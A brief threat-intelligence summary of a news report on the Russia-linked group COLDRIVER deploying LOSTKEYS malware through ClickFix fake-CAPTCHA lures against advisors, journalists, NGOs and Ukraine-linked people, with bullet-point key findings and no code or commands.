The Russia-linked threat actor COLDRIVER has been deploying a new malware called LOSTKEYS in highly targeted espionage activities, using social engineering techniques like ClickFix to infect victims. The campaigns focus on current and former Western government advisors, journalists, NGOs, and individuals connected to Ukraine, with the malware capable of stealing files, system info, and running processes. (Affected: Western government advisors, journalists, NGOs, Ukrainian individuals)
Keypoints :
- COLDRIVER has introduced LOSTKEYS, a new custom malware used in targeted espionage campaigns since early 2025.
- The malware is delivered via sophisticated social engineering, including ClickFix-based methods involving fake CAPTCHA prompts and PowerShell downloads.
- LOSTKEYS can exfiltrate files with specific extensions, send system information, and identify running processes on compromised devices.
- Additional artifacts linked to LOSTKEYS have been identified as far back as December 2023, masquerading as binaries from the Maltego platform.
- The group has transitioned from credential theft campaigns to deploying malware directly onto targetsβ systems, marking a strategic shift in their operations.
- ClickFix is increasingly used by various threat actors to spread malware such as Lampion, Atomic Stealer, and others, often via complex multi-stage infection chains.
- Recent campaigns leverage sophisticated techniques like blockchain-based payload concealment and large-scale watering hole attacks, exemplified by the MacReaper campaign compromising thousands of websites.
Read More: https://thehackernews.com/2025/05/russian-hackers-using-clickfix-fake.html